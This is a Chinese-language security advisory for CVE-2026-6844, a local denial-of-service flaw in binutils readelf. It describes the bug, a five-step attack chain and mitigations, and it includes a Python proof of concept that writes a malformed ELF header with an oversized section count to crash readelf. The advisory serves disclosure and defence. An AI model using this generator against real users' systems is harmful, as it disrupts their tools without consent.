CVE-2026-6844: binutils readelf 本地拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2026-6844

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

binutils

漏洞概述

binutils软件包中的readelf实用程序存在安全漏洞。本地攻击者可诱导用户处理特制的ELF文件，利用资源耗尽（CWE-400）和空指针解引用（CWE-476）缺陷进行攻击。这会导致内存耗尽或段错误，致使readelf工具崩溃或停止响应，从而造成拒绝服务。

技术细节

该漏洞源于binutils包中readelf工具在解析ELF（Executable and Linkable Format）文件时，未能正确处理异常数据结构及边界条件。攻击者可构造恶意的ELF文件，其中包含精心设计的节区头或程序头。当readelf尝试分析此类文件时，可能触发两种不同的代码路径错误：首先是资源耗尽（CWE-400），解析逻辑可能陷入死循环或申请过量内存，导致主机内存耗尽；其次是空指针解引用（CWE-476），特定的数据组合导致内部指针初始化为NULL，后续代码在未校验的情况下直接引用该指针进行读写操作，引发段错误。由于攻击向量为本地且需用户交互，攻击者需诱骗受害者执行readelf命令处理恶意文件。成功利用将导致工具进程崩溃，无法完成文件分析任务，造成拒绝服务。

攻击链分析

STEP 1

1

攻击者构造包含恶意结构的ELF文件，例如设置极大的节区头数量（e_shnum）或特定的无效指针。

STEP 2

2

攻击者将恶意ELF文件发送给目标受害者，或将其放置在受害者可访问的位置。

STEP 3

3

受害者被诱导在本地系统上使用readelf工具打开并解析该恶意文件（满足UI:R交互要求）。

STEP 4

4

readelf在解析过程中触发资源耗尽或空指针解引用错误，导致进程崩溃或系统内存耗尽。

STEP 5

5

readelf工具停止响应，造成拒绝服务，影响正常的文件分析工作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct

# Malformed ELF PoC generator for CVE-2026-6844
# This generates an ELF file with a huge e_shnum to trigger resource exhaustion (CWE-400)

def generate_malformed_elf(filename):
    # ELF Header (64-bit)
    # e_ident: 0x7f 'E' 'L' 'F'
    e_ident = b'\x7fELF\x02\x01\x01\x00' + b'\x00' * 8
    
    # Set e_type to ET_EXEC (Executable)
    e_type = struct.pack('<H', 2)
    
    # Set e_machine to EM_X86_64
    e_machine = struct.pack('<H', 62)
    
    # Set e_version
    e_version = struct.pack('<I', 1)
    
    # Set entry point and offsets (placeholder)
    e_entry = struct.pack('<Q', 0)
    e_phoff = struct.pack('<Q', 0)
    e_shoff = struct.pack('<Q', 64) # Section header offset right after header
    
    # Set e_flags
    e_flags = struct.pack('<I', 0)
    
    # Set e_ehsize (size of this header)
    e_ehsize = struct.pack('<H', 64)
    
    # Set e_phentsize, e_phnum
    e_phentsize = struct.pack('<H', 0)
    e_phnum = struct.pack('<H', 0)
    
    # Set e_shentsize
    e_shentsize = struct.pack('<H', 64)
    
    # MALICIOUS: Set e_shnum to a very large number to trigger OOM
    # readelf might try to allocate memory based on this value
    e_shnum = struct.pack('<H', 0xFFFF) 
    
    # Set e_shstrndx
    e_shstrndx = struct.pack('<H', 0)
    
    header = e_ident + e_type + e_machine + e_version + e_entry + e_phoff + e_shoff + e_flags + e_ehsize + e_phentsize + e_phnum + e_shentsize + e_shnum + e_shstrndx
    
    with open(filename, 'wb') as f:
        f.write(header)
        # Write one dummy section header to avoid immediate segfault on read size,
        # but logic will loop based on e_shnum
        f.write(b'\x00' * 64)

if __name__ == "__main__":
    generate_malformed_elf('crash_me.elf')
    print("Malformed ELF file generated: crash_me.elf")
    print("Usage: readelf -a crash_me.elf")

影响范围

binutils (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施

建议用户不要对来源不明的ELF文件使用readelf工具进行解析。在受限环境中运行readelf，并设置进程的资源限制（如内存和CPU时间限制），以防止资源耗尽攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6844
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6844
3 Details https://www.cvedetails.com/cve/CVE-2026-6844/
4 VulDB https://vuldb.com/cve/CVE-2026-6844
5 Link https://access.redhat.com/security/cve/CVE-2026-6844
6 Link https://bugzilla.redhat.com/show_bug.cgi?id=2460016